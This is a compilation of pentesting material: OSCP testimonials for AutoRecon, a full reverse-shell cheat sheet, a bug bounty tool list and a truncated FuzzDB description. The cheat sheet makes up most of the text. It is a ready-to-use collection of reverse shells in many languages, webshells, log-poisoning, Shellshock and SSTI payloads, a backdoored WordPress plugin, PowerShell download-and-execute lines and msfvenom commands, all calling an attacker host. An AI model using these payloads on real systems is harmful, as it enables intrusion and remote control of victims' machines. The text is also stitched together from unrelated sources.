OSCP exam. If you're having a hard time getting settled with an enumeration methodology I encourage you to follow the flow and techniques this script uses. It takes out a lot of the tedious work that you're probably used to while at the same time provide well-organized subdirectories to quickly look over so you don't lose your head. The manual commands it provides are great for those specific situations that need it when you have run out of options. It's a very valuable tool, cannot recommend enough. > >\- d0hnuts (rooted 5/5 exam hosts) > Autorecon is not just any other tool, it is a recon correlation framweork for engagements. This helped me fire a whole bunch of scans while I was working on other targets. This can help a lot in time management. This assisted me to own 4/5 boxes in pwk exam! Result: Passed! > >\- Wh0ami (rooted 4/5 exam hosts) > The first time I heard of AutoRecon I asked whether I actually needed this, my enumeration was OK... I tried it with an open mind and straight away was a little floored on the amount of information that it would generate. Once I got used to it, and started reading the output I realized how much I was missing. I used it for the OSCP exam, and it found things I would never have otherwise found. I firmly believe, without AutoRecon I would have failed. It's a great tool, and I'm very impressed what Tib3rius was able to craft up. Definitely something I'm already recommending to others, including you! > >\- othornew > AutoRecon helped me save valuable time in my OSCP exam, allowing me to spend less time scanning systems and more time breaking into them. This software is worth its weight in gold! > >\- TorHackr > The magical tool that made enumeration a piece of cake, just fire it up and watch the beauty of multi-threading spitting a ton of information that would have taken loads of commands to execute. I certainly believe that by just using AutoRecon in the OSCP exam, half of the effort would already be done. Strongly recommended! > >\- Arman (solved 4.5/5 exam hosts)
Original repo : https://github.com/d4t4s3c/Offensive-Reverse-Shell-Cheat-Sheet # `Offensive Reverse Shell (Cheat Sheet)` - [<kbd>Bash</kbd>](#Bash) * [<kbd>Bash URL Encoding</kbd>](#Bash-URL-Encoding) - [<kbd>Netcat</kbd>](#Netcat) * [<kbd>Netcat Linux</kbd>](#Netcat-Linux) * [<kbd>Netcat Windows</kbd>](#Netcat-Windows) * [<kbd>Netcat URL Encoding</kbd>](#Netcat-URL-Encoding) * [<kbd>Netcat Base64 Encoding</kbd>](#Netcat-Base64-Encoding) - [<kbd>cURL</kbd>](#cURL) - [<kbd>Wget</kbd>](#Wget) - [<kbd>WebShell</kbd>](#WebShell) * [<kbd>Exif Data</kbd>](#Exif-Data) * [<kbd>ASP WebShell</kbd>](#ASP-WebShell) * [<kbd>PHP WebShell</kbd>](#PHP-WebShell) * [<kbd>Log Poisoning WebShell</kbd>](#Log-Poisoning-WebShell) * [<kbd>SSH</kbd>](#Log-Poisoning-SSH) * [<kbd>FTP</kbd>](#Log-Poisoning-FTP) * [<kbd>HTTP</kbd>](#Log-Poisoning-HTTP) - [<kbd>Server Side Template Injection (SSTI)</kbd>](#Server-Side-Template-Injection) - [<kbd>UnrealIRCd</kbd>](#UnrealIRCd) - [<kbd>Exif Data</kbd>](#Exif-Data-Reverse-Shell) - [<kbd>Shellshock</kbd>](#Shellshock) * [<kbd>SSH</kbd>](#Shellshock-SSH) * [<kbd>HTTP</kbd>](#Shellshock-HTTP) * [<kbd>HTTP 500 Internal Server Error</kbd>](#Shellshock-HTTP-500-Internal-Server-Error) - [<kbd>CMS</kbd>](#CMS) * [<kbd>WordPress</kbd>](#WordPress) * [<kbd>October</kbd>](#October) * [<kbd>Jenkins</kbd>](#Jenkins) * [<kbd>Windows</kbd>](#Jenkins-Windows) * [<kbd>Linux</kbd>](#Jenkins-Linux) - [<kbd>Perl</kbd>](#Perl) - [<kbd>Python</kbd>](#Python) - [<kbd>Python3</kbd>](#Python3) - [<kbd>PHP</kbd>](#PHP) - [<kbd>Ruby</kbd>](#Ruby) - [<kbd>Xterm](#Xterm) - [<kbd>Ncat</kbd>](#Ncat) - [<kbd>Socat</kbd>](#Socat) - [<kbd>PowerShell</kbd>](#PowerShell) - [<kbd>Awk</kbd>](#Awk) - [<kbd>Gawk</kbd>](#Gawk) - [<kbd>Golang</kbd>](#Golang) - [<kbd>Telnet</kbd>](#Telnet) - [<kbd>Java</kbd>](#Java) - [<kbd>Node</kbd>](#Node) - [<kbd>Msfvenom</kbd>](#Msfvenom) * [<kbd>Web Payloads</kbd>](#Web-Payloads) * [<kbd>PHP</kbd>](#PHP-Payload) * [<kbd>WAR</kbd>](#WAR-Payload) * [<kbd>JAR</kbd>](#JAR-Payload) * [<kbd>JSP</kbd>](#JSP-Payload) * [<kbd>ASPX</kbd>](#ASPX-Payload) * [<kbd>Linux Payloads</kbd>](#Linux-Payloads) * [<kbd>Listener Netcat</kbd>](#Linux-Listener-Netcat) * [<kbd>Listener Metasploit Multi Handler</kbd>](#Linux-Listener-Metasploit-Multi-Handler) * [<kbd>Windows Payloads</kbd>](#Windows-Payloads) * [<kbd>Listener Netcat</kbd>](#Windows-Listener-Netcat) * [<kbd>Listener Metasploit Multi Handler</kbd>](#Windows-Listener-Metasploit-Multi-Handler) --- # <kbd>Bash</kbd> # <kbd>TCP</kbd> ```cmd bash -i >& /dev/tcp/192.168.1.2/443 0>&1 bash -l > /dev/tcp/192.168.1.2/443 0<&1 2>&1 sh -i 5<> /dev/tcp/192.168.1.2/443 0<&5 1>&5 2>&5 bash -c "bash -i >& /dev/tcp/192.168.1.2/443 0>&1" 0<&196;exec 196<>/dev/tcp/192.168.1.2/443; sh <&196 >&196 2>&196 exec 5<>/dev/tcp/192.168.1.2/443;cat <&5 | while read line; do $line 2>&5 >&5; done ``` # <kbd>UDP</kbd> ```cmd sh -i >& /dev/udp/192.168.1.2/443 0>&1 ``` # <kbd>Bash URL Encoding</kbd> ```cmd bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.1.2%2F443%200%3E%261%22 ``` --- # <kbd>Netcat</kbd> # <kbd>Netcat Linux</kbd> ```cmd nc -e /bin/sh 192.168.1.2 443 nc -e /bin/bash 192.168.1.2 443 nc -c /bin/sh 192.168.1.2 443 nc -c /bin/bash 192.168.1.2 443 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.2 443 >/tmp/f ``` --- # <kbd>Netcat Windows</kbd> ```cmd nc.exe -e cmd 192.168.1.2 443 \\192.168.1.2\a\nc.exe -e cmd 192.168.1.2 443 ``` --- # <kbd>Netcat URL Encoding</kbd> ```cmd nc%20-e%20%2Fbin%2Fsh%20192.168.1.2%20443 ``` ```cmd rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%20192.168.1.2%20443%20%3E%2Ftmp%2Ff ``` # <kbd>Netcat Base64 Encoding</kbd> ```cmd echo "cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTkyLjE2OC4xLjE4IDQ0MyA+L3RtcC9mCg==" | base64 -d | sh ``` --- # <kbd>cURL</kbd> ```cmd root@kali:~# echo "nc -e /bin/sh 192.168.1.2 443" > index.html; python3 -m http.server 80 root@kali:~# nc -lvnp 443 ``` ```cmd http://192.168.1.3/cmd.php?cmd=curl 192.168.1.2/index.html|sh ``` --- # <kbd>Wget</kbd> ```cmd root@kali:~# echo "nc -e /bin/sh 192.168.1.2 443" > index.html; python3 -m http.server 80 root@kali:~# nc -lvnp 443 ``` ```cmd http://192.168.1.3/cmd.php?cmd=wget -qO- 192.168.1.2/index.html|sh ``` --- # <kbd>WebShell</kbd> # <kbd>Exif Data</kbd> ```cmd root@kali:~# exiftool -Comment='<?php system($_GET['cmd']); ?>' filename.png root@kali:~# mv filename.png filename.php.png ``` # <kbd>ASP WebShell</kbd> ```asp <%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%> ``` # <kbd>PHP WebShell</kbd> # <kbd>Basic</kbd> ```php <?php system($_GET['cmd']); ?> ``` ```php <?php passthru($_GET['cmd']); ?> ``` ```php <?php echo exec($_GET['cmd']); ?> ``` ```php <?php echo shell_exec($_GET['cmd']); ?> ``` # <kbd>Basic Proportions OK</kbd> ```php <?php echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>"; ?> ``` --- # <kbd>Log Poisoning WebShell</kbd> # <kbd>Log Poisoning SSH</kbd> > /var/log/auth.log ```php ssh '<?php system($_GET['cmd']); ?>'@192.168.1.2 ``` > /var/log/auth.log&cmd=id --- # <kbd>Log Poisoning FTP</kbd> > /var/log/vsftpd.log ```cmd root@kali:~# ftp 192.168.1.3 Connected to 192.168.1.3. 220 (vsFTPd 3.0.3) Name (192.168.1.2:kali): <?php system($_GET['cmd']); ?> 331 Please specify the password. Password: <?php system($_GET['cmd']); ?> 530 Login incorrect. Login failed. ftp> ``` > /var/log/vsftpd.log&cmd=id --- # <kbd>Log Poisoning HTTP</kbd> > /var/log/apache2/access.log > > /var/log/nginx/access.log ```cmd curl -s -H "User-Agent: <?php system(\$_GET['cmd']); ?>" "http://192.168.1.2" ``` ```cmd User-Agent: <?php system($_GET['cmd']); ?> ``` > /var/log/apache2/access.log&cmd=id > > /var/log/nginx/access.log&cmd=id --- # <kbd>Server Side Template Injection</kbd> ```cmd {{request.application.__globals__.__builtins__.__import__('os').popen('nc -e /bin/sh 192.168.1.2 443').read()}} ``` ```cmd {{''.__class__.__mro__[1].__subclasses__()[373]("bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1'",shell=True,stdout=-1).communicate()[0].strip()}} ``` ```cmd {% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.2\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\", \"-i\"]);'").read().zfill(417)}}{%endif%}{% endfor %} ``` ```cmd {% import os %}{{os.system('bash -c "bash -i >& /dev/tcp/192.168.1.2/443 0>&1"')}} ``` ```cmd %7B%25%20import%20os%20%25%7D%7B%7Bos.system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.1.2%2F443%200%3E%261%22%27%29%7D%7D ``` --- # <kbd>UnrealIRCd</kbd> ```cmd root@kali:~# echo "AB;nc -e /bin/sh 192.168.1.2 443" |nc 192.168.1.3 6697 ``` --- # <kbd>Exif Data Reverse Shell</kbd> ```cmd root@kali:~# exiftool -Comment='<?php system("nc -e /bin/bash 192.168.1.2 443"); ?>' filename.png root@kali:~# mv filename.png filename.php.png ``` --- # <kbd>Shellshock</kbd> # <kbd>Shellshock SSH</kbd> ```cmd root@kali:~# ssh user@192.168.1.3 -i id_rsa '() { :;}; nc 192.168.1.2 443 -e /bin/bash' ``` --- # <kbd>Shellshock HTTP</kbd> ```cmd curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/192.168.1.2/443 0>&1' http://192.168.1.3/cgi-bin/test.sh ``` ```cmd curl -H "User-Agent: () { :; }; /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1'" "http://192.168.1.3/cgi-bin/evil.sh" curl -H "User-Agent: () { :; }; /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1'" "http://192.168.1.3/cgi-bin/evil.cgi" ``` --- # <kbd>Shellshock HTTP 500 Internal Server Error</kbd> ```cmd curl -H "User-Agent: () { :; }; echo; /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1'" "http://192.168.1.3/cgi-bin/evil.sh" curl -H "User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1'" "http://192.168.1.3/cgi-bin/evil.sh" curl -H "User-Agent: () { :; }; echo; /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1'" "http://192.168.1.3/cgi-bin/evil.cgi" curl -H "User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1'" "http://192.168.1.3/cgi-bin/evil.cgi" ``` --- # <kbd>CMS</kbd> # <kbd>WordPress</kbd> # <kbd>Plugin Reverse Shell</kbd> ```cmd root@kali:~# nano plugin.php ``` ```php <?php /** * Plugin Name: Shelly * Plugin URI: http://localhost * Description: Love Shelly * Version: 1.0 * Author: d4t4s3c * Author URI: https://github.com/d4t4s3c */ exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1'"); ?> ``` ```cmd root@kali:~# zip plugin.zip plugin.php ``` * Plugins * Add New * Upload Plugin * Install Now * Activate Plugin # <kbd>October</kbd> ```cmd function onstart(){ exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.1.2/443 0>&1'"); } ``` --- # <kbd>Jenkins</kbd> # <kbd>Jenkins Windows</kbd> ```cmd println "\\\\192.168.1.2\\a\\nc.exe -e cmd 192.168.1.2 443" .execute().text ``` ```cmd String host="192.168.1.2"; int port=443; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ``` ```cmd command = "powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.2:8000/reverse.ps1')" println(command.execute().text) ``` # <kbd>Jenkins Linux</kbd> ```cmd String host="192.168.1.2"; int port=443; String cmd="bash"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); ``` --- # <kbd>Perl</kbd> ```cmd perl -e 'use Socket;$i="192.168.1.2";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ``` --- # <kbd>Python</kbd> ```cmd export RHOST="192.168.1.2";export RPORT=443;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' ``` ```cmd python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' ``` # <kbd>Python3</kbd> ```cmd #!/usr/bin/python3 import os import socket import subprocess s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.1.2",443)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"]) ``` ```cmd python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' ``` --- # <kbd>PHP</kbd> ```php <?php passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.2 443 >/tmp/f"); ?> ``` ```php php -r '$sock=fsockopen("192.168.1.2",443);`/bin/sh -i <&3 >&3 2>&3`;' php -r '$sock=fsockopen("192.168.1.2",443);exec("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen("192.168.1.2",443);system("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen("192.168.1.2",443);passthru("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen("192.168.1.2",443);popen("/bin/sh -i <&3 >&3 2>&3", "r");' php -r '$sock=fsockopen("192.168.1.2",443);shell_exec("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen("192.168.1.2",443);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);' ``` --- # <kbd>Ruby</kbd> ```cmd ruby -rsocket -e'f=TCPSocket.open("192.168.1.2",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.1.2","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ruby -rsocket -e 'c=TCPSocket.new("192.168.1.2","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ``` --- # <kbd>Xterm</kbd> ```cmd xterm -display 192.168.1.2:443 ``` --- # <kbd>Ncat</kbd> # <kbd>TCP</kbd> ```cmd ncat 192.168.1.2 443 -e /bin/bash ncat 192.168.1.2 443 -e /bin/sh ``` # <kbd>UDP</kbd> ```cmd rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|ncat -u 192.168.1.2 443 >/tmp/f ``` --- # <kbd>Socat</kbd> ```cmd socat TCP:192.168.1.2:443 EXEC:sh ``` ```cmd socat TCP:192.168.1.2:443 EXEC:'bash -li',pty,stderr,setsid,sigint,sane ``` --- # <kbd>PowerShell</kbd> ```powershell powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("192.168.1.2",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.2',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.2:8000/reverse.ps1') C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.2/shell.ps1') powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.1.2/powercat.ps1');powercat -c 192.168.1.2 -p 443 -e cmd" ``` --- # <kbd>Awk</kbd> ```cmd awk 'BEGIN {s = "/inet/tcp/0/192.168.1.2/443"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null ``` --- # <kbd>Gawk</kbd> ```cmd gawk 'BEGIN {P=443;S="> ";H="192.168.1.2";V="/inet/tcp/0/"H"/"P;while(1){do{printf S|&V;V|&getline c;if(c){while((c|&getline)>0)print $0|&V;close(c)}}while(c!="exit")close(V)}}' ``` --- # <kbd>Golang</kbd> ```cmd echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.1.2:443");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go ``` --- # <kbd>Telnet</kbd> ```cmd rm -f /tmp/p; mknod /tmp/p p && telnet 192.168.1.2 443 0/tmp/p ``` ```cmd telnet 192.168.1.2 80 | /bin/bash | telnet 192.168.1.2 443 ``` ```cmd mknod a p && telnet 192.168.1.2 443 0<a | /bin/sh 1>a ``` ```cmd TF=$(mktemp -u);mkfifo $TF && telnet 192.168.1.2 443 0<$TF | sh 1>$TF ``` --- # <kbd>Java</kbd> ```cmd r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.1.2/443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() ``` --- # <kbd>Node</kbd> ```cmd require('child_process').exec('bash -i >& /dev/tcp/192.168.1.2/443 0>&1'); ``` --- # <kbd>Msfvenom</kbd> # <kbd>Web Payloads</kbd> # <kbd>PHP Payload</kbd> ```cmd msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f raw > reverse.php ``` ```cmd msfvenom -p php/reverse_php LHOST=192.168.1.2 LPORT=443 -f raw > reverse.php ``` # <kbd>War Payload</kbd> ```cmd msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f war > reverse.war ``` # <kbd>JAR Payload</kbd> ```cmd msfvenom -p java/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f jar > reverse.jar ``` # <kbd>JSP Payload</kbd> ```cmd msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f raw > reverse.jsp ``` # <kbd>ASPX Payload</kbd> ```cmd msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f aspx -o reverse.aspx msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f aspx -o reverse.aspx msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f aspx -o reverse.aspx ``` --- # <kbd>Windows Payloads</kbd> # <kbd>Windows Listener Netcat</kbd> <kbd>x86 - Shell</kbd> ```cmd msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe ``` <kbd>x64 - Shell</kbd> ```cmd msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe ``` # <kbd>Windows Listener Metasploit Multi Handler</kbd> <kbd>x86 - Meterpreter</kbd> ```cmd msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe ``` <kbd>x64 - Meterpreter</kbd> ```cmd msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe ``` <kbd>x86 - Shell</kbd> ```cmd msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe ``` <kbd>x64 - Shell</kbd> ```cmd msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f exe > reverse.exe ``` --- # <kbd>Linux Payloads</kbd> # <kbd>Linux Listener Netcat</kbd> <kbd>x86 - Shell</kbd> ```cmd msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.elf ``` <kbd>x64 - Shell</kbd> ```cmd msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.elf ``` --- # <kbd>Linux Listener Metasploit Multi Handler</kbd> <kbd>x86 - Meterpreter</kbd> ```cmd msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.elf ``` <kbd>x64 - Meterpreter</kbd> ```cmd msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.elf ``` <kbd>x86 - Shell</kbd> ```cmd msfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.elf ``` <kbd>x64 - Shell</kbd> ```cmd msfvenom -p linux/x64/shell/reverse_tcp LHOST=192.168.1.2 LPORT=443 -f elf > reverse.elf ``` ---
# Bug Bounty Hunting: I prefer below available resources to succeed in Bug Bounty Hunting. I'll update this monthly with new techniques. ## Platforms: 1. OpenBugBounty - (XSS/CSRF/IDOR)(Will accept report from any site) 2. BugCrowd 3. HackerOne 3. Cobalt.io 4. SynAck (Only invited researchers) 5. Other self hosted programs by different domains (Facebook Whitehat/Google VRP/ AT&T BB) ## Sub Domain Enumeration: 1. Enumall 2. Massdns 3. Sublist3r 4. Knock 5. VirusTotal 6. Shodan 7. Censys 8. Eye witness 9. [DNS Dumpster](https://dnsdumpster.com) 10. Google Dorking (site:sony.com -www) 11. Virus Total 12. [BugCrowd LevelUp](https://github.com/appsecco/bugcrowd-levelup-subdomain-enumeration) 13. DNSScan 14. Altdns 15. dns-parallel-prober 16. brutesubs 17. dirsearch 18. Aquatone ## Sub Domain Takeovers: ### Cloudfront Entries 1. ride.uber.com - cname - cloudfront.com 2. xxxx.ubnt.com - cname - cloudfront.com ### AWS Misconfiguration 1. rubyci.s3.amazonaws.com 2. hackerone 3. uber 4. ubiquitinetworks 5. twitter etc. ### Default Pre-Installed Instances (Install-Update Credentials-Report) [snapchat wordpress instance](https://hackerone.com/reports/274336) ### Unbouncepages - Cname: unbouncepages.com - Name: landing.udemy.com - Type: CNAME - Class: IN - TTL: 300 ### Google Mapped Domains - 216.58.203.243 moderator.ubnt.com - 216.58.203.243 ghs.google.com - 216.58.203.243 ghs.l.google.com ## Automation: 1. autoSubTakeover [Github] 2. HostileSubBruteforcer 3. tko-subs 4. [Aws Extender](https://github.com/VirtueSecurity/aws-extender) ## Git - Recon: 1. gitrob 2. git-all-secrets 3. trufflehog 4. git-secrets 5. repo-supervisor ## API Enumeration from JS files: [LinkFinder](https://github.com/GerbenJavado/LinkFinder) ## Acquisition Enumeration: 1. Crunchbase 2. [crt.sh](https://crt.sh) 3. [Censys](https://censys.io) 4. [Google Cert Repo](https://google.com/transparencyreport/https/ct) ## Content Discovery / Dir Bruting: 1. Wappalyzer 2. Retire.js 3. Built With 4. Vulners CVE Scanner 5. Patator 6. GoBuster 7. WPScan 8. CMSMap 9. Robots Disallowed 10. Burp Content Discovery 11. CMSExplorer 12. BlindElephant ## Content Management System Bugs: 1. Adobe Cold Fusion - (Famous RCE/Admin Salt Leakage/SQL Vuln) 2. Drupal CMS - (RCE) 3. Wordpress - (Plenty of Bugs) 4. Jenkins Automation Server ## Parameter Bruter: 1. Parameth 2. Back Slash Powered Scanner [Burp] ## XSS: 1. Polyglot 2. [FlashScanner](https://cure53.de/flashbang) 3. Common Input Vectors 4. Blind XSS Frameworks - Sleepy Puppy [Python] - XSS Hunter [Python] - Ground Control [Ruby/Smail] 5. [XSS MindMap](https://github.com/jackmasa) 6. XSS Hunter 7. Flash XSS (FFDec-ompiler, https://github.com/riusksk/FlashScanner, https://cure53.de/flashbang) ## Flash CSRF: 1. Target is Accepting on JSON format data and Blocking Cross Domain requests with CORS. [GeekBoy POC](https://www.geekboy.ninja/blog/tag/flash-csrf/) ## SSTI: 1. [TPLMap](https://github.com/epinna/tplmap) ## SSRF: 1. Blind SSRF - Google PoC. - Twitter PoC. - AWS metadata acquiring 2. Full SSRF 3. Out of Band ## OAuth/OpenRedirect: Validation missing on State/Token/Code (Open Redirection on Google Acquisition) ## Fuzzing API: [Fuzzapi](https://github.com/Fuzzapi/fuzzapi) ## Logical Bugs: 1. Email Verification Check fails 2. Money Rounding Issues. ## Denial of Service: 1. Via Large input. 2. Via Images. 3. Via XLS/PDF/TXT. 4. Via Out of Band Blind SSRF. ## Android-Hunts: 1. Decompile app --> Look for /assets/ or /res/raw [AWS Prod Keys, Dev Leftovers] 2. Check for External Storage - Binary Info/Code without validation, Sandbox leak, GPS Info, Log Files 3. Detecting Read/Write External Storage - FileObserver 4. Obfuscation - Proguard 5. Webview Checks - setAllowContent - setAllowFileAccess - setAllowFileAccessFromURLs - setJavaScriptEnabled - setPluginState - setSavePassword 6. JavaScriptInterfaces - "jsvar" -------> RCE CVE-2012-6636 (SDK<=17 supported apps vulnerable) ## Payloads: 1. https://github.com/1N3 2. https://github.com/danielmiessler/SecLists ## Ref: 1. [Ron Chan Ref](https://github.com/ngalongc/bug-bounty-reference) 2. bugbounty.community/tools
FuzzDB was created to increase the likelihood of finding application security vulnerabilities through dynamic application security testing. It's the first and most comprehensive open dictionary of fault injection patterns, predictable resource locations, and regex for matching server responses. **Attack Patterns -** FuzzDB contains comprehensive lists of [attack payload](https://github.com/fuzzdb-project/fuzzdb/tree/master/attack) primitives for fault injection testing. These patterns, categorized by attack and where appropriate platform type, are known to cause issues like OS command injection, directory listings, directory traversals, source exposure, file upload bypass, authentication bypass, XSS, http header crlf injections, SQL injection, NoSQL injection, and more. For example, FuzzDB catalogs 56 patterns that can potentially be interpreted as a null byte and contains lists of [commonly used methods](https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/business-logic/CommonMethodNames.txt) such as "get, put, test," and name-value pairs than [trigger debug modes](https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/business-logic/CommonDebugParamNames.txt).<br> **Discovery -** The popularity of standard software packaging distribution formats and installers resulted in resources like [logfiles and administrative directories](http://www.owasp.org/index.php/Forced_browsing) frequently being located in a small number of [predictable locations](https://github.com/fuzzdb-project/fuzzdb/tree/master/discovery/predictable-filepaths). FuzzDB contains a comprehensive dictionary, sorted by platform type, language, and application, making brute force testing less brutish.<br> https://github.com/fuzzdb-project/fuzzdb/tree/master/discovery **Response Analysis -** Many interesting server responses are [predictable strings](https://github.com/fuzzdb-project/fuzzdb/tree/master/regex). FuzzDB contains a set of regex pattern dictionaries to match against server responses. In addition to common server error messages, FuzzDB contains regex for credit cards, social security numbers, and more.<br> **Other useful stuff -** Webshells in 